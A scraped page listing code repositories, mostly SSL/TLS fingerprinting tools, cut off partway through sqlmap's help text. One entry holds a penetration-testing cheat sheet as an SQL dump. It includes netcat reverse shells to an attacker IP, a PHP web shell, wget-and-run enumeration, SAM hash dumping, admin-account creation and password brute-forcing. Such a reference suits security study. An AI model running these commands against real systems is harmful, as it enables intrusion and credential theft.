17 skills found
salesforce / Ja3JA3 is a standard for creating SSL client fingerprints in an easy to produce and shareable way.
WestpointLtd / Tls ProberA tool to fingerprint SSL/TLS servers
fooinha / Nginx Ssl Ja3nginx module for SSL/TLS ja3 fingerprint.
phuslu / Nginx Ssl FingerprintHigh performance ja3 and http2 fingerprint for nginx.
mmarting / UnwafUnwaf is a Go tool designed to help identify WAF bypasses using passive techniques. It automates the process of discovering the real origin IP behind a WAF/CDN by combining multiple discovery methods and verifying candidates through HTML similarity comparison, SSL certificate fingerprinting, and HTTP header analysis.
Don-No7 / Hack SQL-- -- File generated with SQLiteStudio v3.2.1 on Sun Feb 7 14:58:28 2021 -- -- Text encoding used: System -- PRAGMA foreign_keys = off; BEGIN TRANSACTION; -- Table: Commands CREATE TABLE Commands (Command_No INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, Name TEXT REFERENCES Programs (Name) NOT NULL, Description TEXT NOT NULL, Command TEXT, File BLOB); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (1, 'Kerbrute', 'brute single user password', 'kerbrute bruteuers [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (2, 'Kerbrute', 'brute username:password combos from file or stdin', 'kerbrute brutforce [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (3, 'Kerbrute', 'test a single password agains a list of users', 'kerbrute passwordspray [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (4, 'Kerbrute', 'Enumerate valid domain usernames via kerberos', 'kerbrute userenum [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (5, 'Name-That-Hash', 'Find the hash type of a string', 'nth --text ''<hash>''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (6, 'Name-That-Hash', 'Find the hash type of a file', 'nth --file <hash file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (7, 'Nmap', 'scan for vulnerabilites', 'nmap --script vuln <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (8, 'Nikto', 'Scan host for vulnerabilites', 'nikto -h <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (9, 'SMBClient', 'check for misconfigured anonymous login', 'smbclient -L \\\\<HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (10, 'Hydra', 'Brutforce a webpage looking for usernames', 'hydra -l <user wordlist> -p 123 <HOST_IP> http-post-form ''/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=<output string on failure>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (11, 'SMBMap', 'enumerates SMB file shares', 'smbmap -u <user> -p <pass> -H <host IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (12, 'WPScan', 'Enumerate Wordpress website', 'wpscan --url <wp site> --enumerate --plugins-detection', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (13, 'WPScan', 'enumerate though known usernames', 'wpscan --url <HOST_IP> --usernames <USERNAME_FOUND> --passwords wordlist.dic', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (14, 'PowerShell', 'bypass execution policy', 'powershell.exe -exec bypass', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (15, 'TheHarvester', 'gathering informaiton from online sources', 'theharvester -d <domain> -l <#> -g -b google', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (16, 'Netcat', 'open a listener', 'nc -lvnp <port #>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (17, 'Netcat', 'Connect to computer', 'nc <attacker ip> <attacker port>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (18, 'GoBuster', 'Eunmerate directories on a website with a cookie', 'gobuster dir -u http://<IP> -w <wordlist> -x <extention> -c PHPSESSID=<cookie val>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (19, 'SQLMap', 'map sql at an IP', 'sqlmap -r <IP> --batch --force-ssl', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (20, 'John the Ripper', 'Use wordlist to parse hash', 'john <HASHES_FILE> --wordlist=<wordlist>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (21, 'John the Ripper', 'unencrypt shadow file', 'john <Unshadowed passwds>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (22, 'Unshadow', 'combine /etc/passwd and /etc/shadow file for cracking', 'unshadow <passwd> <shadow>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (23, 'Hashcat', 'crack hashes with a wordlist', 'hashcat -m <hash type> -a 0 -o <output file> <hash file> <wordlist> --force', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (26, 'Enum4Linux', 'basic command', 'enum4linux -a <IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (27, 'SMBClient', 'connect to a SMB share', 'smbclinet //<IP>/<share> -U <username>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (28, 'Netcat', 'connect with shell (-e doest always work)', 'nc -e /bin/sh <ATTACKING-IP> 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (29, 'Netcat', 'connect with shell (-e doest always work)', '/bin/sh | nc ATTACKING-IP 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (30, 'Netcat', 'done on the target', 'rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (31, 'SQLMap', 'Check form for SQL injection', 'sqlmap -o -u "http://meh.com/form/" –forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (32, 'SQLMap', 'automated SQL scan', 'sqlmap -u <URL> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (33, 'CrackMapExec', 'run a mimikatz module', 'crackmapexec smb <target(s)> -u <username> -p <password> --local-auth -M mimikatz', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (34, 'CrackMapExec', 'Command execution', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' -x whoami', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (35, 'CrackMapExec', 'check logged in users', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' --lusers', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (36, 'CrackMapExec', 'dump local SAM hashes', 'crackmapexec <target(s)> -u ''<uesrname>'' -p ''<password>'' --local-auth --sam', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (37, 'CrackMapExec', 'null session login', 'crackmapexec smb <target(s)> -u '''' -p ''''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (38, 'CrackMapExec', 'list modules', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (39, 'CrackMapExec', 'pass the hash', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (41, 'IKE-Scan', 'attack pre shared key with dictionary', 'psk-crack -d </path/to/dictionary> <psk file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (42, 'IKE-Scan', 'If you find a SonicWALL VPN using agressive mode it will require a group id, the default group id is GroupVPN', 'ike-scan <IP> -A -id GroupVPN', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (43, 'IKE-Scan', 'to find aggressive mode VPNs and save for use with psk-crack', 'ike-scan <IP> -A -P<file out>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (44, 'John the Ripper', 'crack passwords with korelogic rules', 'for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w:<wordlist> <password_file> ; done', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (45, 'Nmap', 'create a list of ip addresses ', 'nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (46, 'Linux commands', 'mount NFS share on linux', 'mount -t nfs server:/share /mnt/point', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (47, 'PowerShell', 'create new user', 'net user <username> <password> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (48, 'PowerShell', 'add user to a group (normaly Administrators)', 'net localgroup <group> <username> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (49, 'PSK-Crack', 'brute force with specified length and specified chars (if left blank default is 36)', 'psk-crack -b <#> --charset="<charlist>" <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (50, 'PSK-Crack', 'dictianary attack', 'psk-crack -d <file> <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (51, 'SQLMap', 'check form for SQL injection', 'sqlmap -o -u "<url of form>" --forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (52, 'SQLMap', 'Scan url for union + error based injection with mysql backend and use a random user agent + database dump', 'sqlmap -u "<form URL>?id=1>" --dbms=mysql --tech=U --random-agent --dump ', NULL); -- Table: Exploits CREATE TABLE Exploits (Target TEXT, Type TEXT, Criteria TEXT, Method TEXT, Code TEXT, Result TEXT, Notes TEXT); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Injection', 'ability to write to website folder', 'create or edit a mage of the website and insert the code to get remote access to the machine', '<? php system ($ _ GET [''cmd'']); ?>', 'execute code via url', '<URL of php>?cmd=<code to execue>'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'shell', 'enter code into the shell to find vulnerbilities int he machine', 'find / -perm -u=s -type f 2>/dev/null', 'SUID binaries', 'link output to GTFO bins and exploit'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Box', 'Priv Esc', 'Python binary running as root', 'generate a shell using python to grain root access', 'python3 -c "import pty;pty.spawn(''/bin/sh'');"', 'root shell', 'change pyton varibale acordingly'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('SQL', 'Priv Esc', 'MySQL binary running as root', 'enter into MySQL command line and break out into root y using the code', 'mysql> \! /bin/sh', 'get shell from root priv SQL', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'low privilage shell', 'use the code to search for programs that run as sudo without password', 'sudo -l', NULL, 'list programs that can be used with sudo and no password'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Windows', 'Priv Esc', 'Powershell', 'use code to enumerate priv esc opertunities', 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """', 'list of unquoted service paths that might be used for priv esc', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'LFI', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', NULL, 'use Linenum.sh to enumerate linux box', 'wget https://www.linenum.sh/ -P /dev/shm/Linenum.sh; chmod +x /dev/shm/linenum.sh ; ./dev/shm/Linenum.sh | tee /dev/shm/lininfo.txt', ' file, /dev/shm/lininfo.txt, with priv esc info', 'it is possible to use other methods of download like: curl or others found on google'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'No-Auth', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Re-Registration', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'JWT', 'a site that uses jSON as cookies', 'edit the information (with BURP) thats going to the website to gain access without authenitaction', NULL, NULL, NULL); -- Table: Programs CREATE TABLE Programs (Name text PRIMARY KEY NOT NULL UNIQUE, Stage TEXT, Description text, Info text, Features TEXT, Target TEXT, Offensive BOOLEAN, commands TEXT); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nmap', 'Enum', 'Used for scanning a network/host to gather more information', 'man pages on linux', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('BURP Suit', 'Enum, Exploit', 'A program for manipulating HTTP requests, enumeration and Exploit', 'https://portswigger.net/burp/documentation/contents', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Metasploit', 'All', 'Powerfull swiss-army-knife of hacking', 'https://docs.rapid7.com/metasploit/', NULL, 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('MSFVenom', 'Exploit', 'Designed for creating payloads', 'https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom', 'Payloads', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Snort', 'Utility', 'Packet sniffer', 'https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/249/original/snort_manual.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIXACIED2SPMSC7GA%2F20210128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210128T192737Z&X-Amz-Expires=172800&X-Amz-SignedHeaders=host&X-Amz-Signature=4b51dc730677d14203c4a4cde25c1831ac64e9eca8df89c6737701811fa3f9fd', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('GoBuster', 'Enum', 'A fuzzer for websites', 'man pages on linux', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hydra', 'Exploit', 'Brutforcer for wesite passwords', 'man pages on linux', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Mimikatz', 'Post', 'Used to exploit kerberos', 'https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Impacket', 'Exploit', 'The fascilitator of python bassed script that uses modules for attacking windows ', 'https://www.secureauth.com/labs-old/impacket/', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Enum4Linux', 'Enum', 'for Enumerating Windows and Samba hosts', 'man pages included, https://tools.kali.org/information-gathering/enum4linux', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Rubeus', 'Exploit', 'Used for kerberos interaction and abuse', 'https://github.com/GhostPack/Rubeus', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Kerbrute', 'Enum, Exploit', 'quickly enumerate and brutforce active directory accounts through kerberos pre-authentication', 'https://github.com/ropnop/kerbrute/', 'Brute', 'Windows', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('John the Ripper', 'Exploit', 'a password brutforcer', 'https://www.openwall.com/john/doc/', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hashcat', 'Exploit', 'A password bruteforces', 'http://manpages.org/hashcat', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Bloodhound', 'Enum', 'Network mapping tool', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Wireshark', 'Utility', 'Packet sniffer', 'https://www.wireshark.org/download/docs/user-guide.pdf', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hash-Identifier', 'Utility', '(superseeded by Name-That-Hash)A simple python program for identifying hashes', 'man pages on linux', NULL, 'Hash', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Scp', 'Utility', 'For transfering files over SSH connection', 'man pages on llinux', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBClient', 'Utility', 'Used to connect to SMB file shares, can be used to enumerate shares', 'man pages on linux', 'Connect', 'SMB', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PowerShell', 'Utility', 'Powerfull comand line for Windows', 'https://www.pdq.com/powershell/', NULL, 'Windows', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Searchsploit', 'Enum', 'Local version of ExploitDB', 'https://www.exploit-db.com/searchsploit', 'Exploit Enum', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Vim', 'Utiility', 'Text editor', 'https://vimhelp.org/', NULL, 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('LinPeas', 'Post', 'For Enumerating Linux computers', 'Simply run on a linux computer', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nikto', 'Enum', 'For full enumeration on websites', 'https://cirt.net/nikto2-docs/', 'Exploit Enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Radare2', 'Utility', 'A tooll used to reverse engineer programs', 'https://github.com/radareorg/radare2/blob/master/doc/intro.md', 'Reverse', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Evil-WinRM', 'Exploit', 'Malware exuivilent of WinRM and used to exploit windows systems', 'https://github.com/Hackplayers/evil-winrm', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Seatbelt', 'Post', 'Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives', 'https://github.com/GhostPack/Seatbelt', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WinPeas', 'Post', 'For full enumeration of windows host (internal)', 'https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Lockless', 'Post', 'LockLess is a C# tool that allows for the enumeration of open file handles and the copying of locked files', 'https://github.com/GhostPack/Lockless', 'File interaction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SQLMap', 'Exploit', 'Automates the process of detecting and exploiting SQL injection flaws and taking over of database servers', 'http://sqlmap.org/', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('KEETheif', 'Post', 'Allows for the extraction of KeePass 2.X key material from memory, as well as the backdooring and enumeration of the KeePass trigger system', 'https://github.com/GhostPack/KeeThief', 'File interacction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('TheHarvester', 'Enum', 'The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database', 'https://tools.kali.org/information-gathering/theharvester', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('jSQLInjection', 'Enum', 'used for gathering SQL databse information form a distant source', 'https://tools.kali.org/vulnerability-analysis/jsql', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hping', 'Enum', 'Ping command on steroids, used to enumerating firewalls', 'https://tools.kali.org/information-gathering/hping3', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux Exploit Suggester', 'Post', 'keeps track of vulnerabilities and suggests exploits to gain root access', 'https://tools.kali.org/exploitation-tools/linux-exploit-suggester', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unix-PrivEsc-Check', 'Post', ' It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps, written in a single shell script so is easy to upload', 'https://tools.kali.org/vulnerability-analysis/unix-privesc-check', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Dotdotpwn', 'Enum', 'It’s a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers', 'https://tools.kali.org/information-gathering/dotdotpwn', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Websploit', 'Enum, Exploit', 'Swiss-army-knife of web exploits ranging from social engineering to honeypots and everything in between', 'https://tools.kali.org/web-applications/websploit', NULL, 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('XSSer', 'Enum', 'To detect, exploit and report XSS vulnerabilities in web-based applications', 'https://tools.kali.org/web-applications/xsser', 'Exploit enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Name-That-Hash', 'Utility', 'Hash-identifier with more deatils and command line based', 'https://github.com/HashPals/Name-That-Hash', NULL, 'N/A', 'N', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBMap', 'Enum', 'enumerate shares over a domin', 'https://tools.kali.org/information-gathering/smbmap', 'Scanning', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Redis-Cli', 'Exploit', 'used for interacting and exploiting reddis-cli on port 6379', 'https://book.hacktricks.xyz/pentesting/6379-pentesting-redis ; https://redis.io/topics/rediscli', 'SQL', 'SQL', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unshadow', 'POST', 'Combining passwd and shadow files into 1', 'simply use: unshadow <passwd file> <shadow file> > <output file>', 'Passwords', 'Hash', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WPScan', 'Enum', 'Look for vulnerabilities in wordpress site', 'https://github.com/wpscanteam/wpscan', 'Scanning', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Netcat', 'Utility', 'used for connecting 2 computers', 'https://www.win.tue.nl/~aeb/linux/hh/netcat_tutorial.pdf', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux commands', 'Post', 'Linux commands used for Priv esc', 'https://gtfobins.github.io, https://wadcoms.github.io', 'Priv Esc', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CrackMapExec', 'Enum,, Exploit', 'Swis army knife of network testing', 'https://ptestmethod.readthedocs.io/en/latest/cme.html', 'Scanning, Exploit', 'Networks', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('IKE-Scan', 'Enum', 'Used to dicover, fingerprint and test IPsec VPN systems', 'http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide', 'Scanning', 'VPN', NULL, NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PSK-Crack', 'Exploit', 'attempts to crack IKE Aggressive Mode pre-shared keys that have previously been gathered using ike-scan with the --pskcrack option', 'https://linux.die.net/man/1/psk-crack', 'Connect, Brute', 'Wifi', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CeWL', 'Enum', 'spiders a given url returning a wordlist that is intednded for cracking passwords', 'https://tools.kali.org/password-attacks/cewl', 'Brute', 'Web', 'Y', NULL); COMMIT TRANSACTION; PRAGMA foreign_keys = on;
ssllabs / SslhafPassive SSL client fingerprinting using handshake analysis.
gen0sec / SynapseXDR with eBPF-powered firewall and proxy. Protect your Linux servers.
c0r0n3r / CryptolyzerCryptoLyzer is a fast, flexible and comprehensive server cryptographic protocol (TLS, SSL, SSH, DNSSEC) and related setting (HTTP headers, DNS records) analyzer and fingerprint (JA3, HASSH tag) generator with Python API and CLI. (read-only clone of the original GitLab project)
lafaspot / Ja3 4javaJava library for SSL/TLS ja3 fingerprint
Xxx-Bin / Php Ja3php for SSL/TLS ja3 fingerprint.
masaudsec / ServerspyFull-stack server fingerprinting tool for bug bounty hunters — auto-detects server, CDN, WAF, SSL, ports & more
HlaingPhyoAung / SqlmapUsage: python sqlmap.py [options] Options: -h, --help Show basic help message and exit -hh Show advanced help message and exit --version Show program's version number and exit -v VERBOSE Verbosity level: 0-6 (default 1) Target: At least one of these options has to be provided to define the target(s) -d DIRECT Connection string for direct database connection -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1") -l LOGFILE Parse target(s) from Burp or WebScarab proxy log file -x SITEMAPURL Parse target(s) from remote sitemap(.xml) file -m BULKFILE Scan multiple targets given in a textual file -r REQUESTFILE Load HTTP request from a file -g GOOGLEDORK Process Google dork results as target URLs -c CONFIGFILE Load options from a configuration INI file Request: These options can be used to specify how to connect to the target URL --method=METHOD Force usage of given HTTP method (e.g. PUT) --data=DATA Data string to be sent through POST --param-del=PARA.. Character used for splitting parameter values --cookie=COOKIE HTTP Cookie header value --cookie-del=COO.. Character used for splitting cookie values --load-cookies=L.. File containing cookies in Netscape/wget format --drop-set-cookie Ignore Set-Cookie header from response --user-agent=AGENT HTTP User-Agent header value --random-agent Use randomly selected HTTP User-Agent header value --host=HOST HTTP Host header value --referer=REFERER HTTP Referer header value -H HEADER, --hea.. Extra header (e.g. "X-Forwarded-For: 127.0.0.1") --headers=HEADERS Extra headers (e.g. "Accept-Language: fr\nETag: 123") --auth-type=AUTH.. HTTP authentication type (Basic, Digest, NTLM or PKI) --auth-cred=AUTH.. HTTP authentication credentials (name:password) --auth-file=AUTH.. HTTP authentication PEM cert/private key file --ignore-401 Ignore HTTP Error 401 (Unauthorized) --proxy=PROXY Use a proxy to connect to the target URL --proxy-cred=PRO.. Proxy authentication credentials (name:password) --proxy-file=PRO.. Load proxy list from a file --ignore-proxy Ignore system default proxy settings --tor Use Tor anonymity network --tor-port=TORPORT Set Tor proxy port other than default --tor-type=TORTYPE Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5) --check-tor Check to see if Tor is used properly --delay=DELAY Delay in seconds between each HTTP request --timeout=TIMEOUT Seconds to wait before timeout connection (default 30) --retries=RETRIES Retries when the connection timeouts (default 3) --randomize=RPARAM Randomly change value for given parameter(s) --safe-url=SAFEURL URL address to visit frequently during testing --safe-post=SAFE.. POST data to send to a safe URL --safe-req=SAFER.. Load safe HTTP request from a file --safe-freq=SAFE.. Test requests between two visits to a given safe URL --skip-urlencode Skip URL encoding of payload data --csrf-token=CSR.. Parameter used to hold anti-CSRF token --csrf-url=CSRFURL URL address to visit to extract anti-CSRF token --force-ssl Force usage of SSL/HTTPS --hpp Use HTTP parameter pollution method --eval=EVALCODE Evaluate provided Python code before the request (e.g. "import hashlib;id2=hashlib.md5(id).hexdigest()") Optimization: These options can be used to optimize the performance of sqlmap -o Turn on all optimization switches --predict-output Predict common queries output --keep-alive Use persistent HTTP(s) connections --null-connection Retrieve page length without actual HTTP response body --threads=THREADS Max number of concurrent HTTP(s) requests (default 1) Injection: These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts -p TESTPARAMETER Testable parameter(s) --skip=SKIP Skip testing for given parameter(s) --skip-static Skip testing parameters that not appear dynamic --dbms=DBMS Force back-end DBMS to this value --dbms-cred=DBMS.. DBMS authentication credentials (user:password) --os=OS Force back-end DBMS operating system to this value --invalid-bignum Use big numbers for invalidating values --invalid-logical Use logical operations for invalidating values --invalid-string Use random strings for invalidating values --no-cast Turn off payload casting mechanism --no-escape Turn off string escaping mechanism --prefix=PREFIX Injection payload prefix string --suffix=SUFFIX Injection payload suffix string --tamper=TAMPER Use given script(s) for tampering injection data Detection: These options can be used to customize the detection phase --level=LEVEL Level of tests to perform (1-5, default 1) --risk=RISK Risk of tests to perform (1-3, default 1) --string=STRING String to match when query is evaluated to True --not-string=NOT.. String to match when query is evaluated to False --regexp=REGEXP Regexp to match when query is evaluated to True --code=CODE HTTP 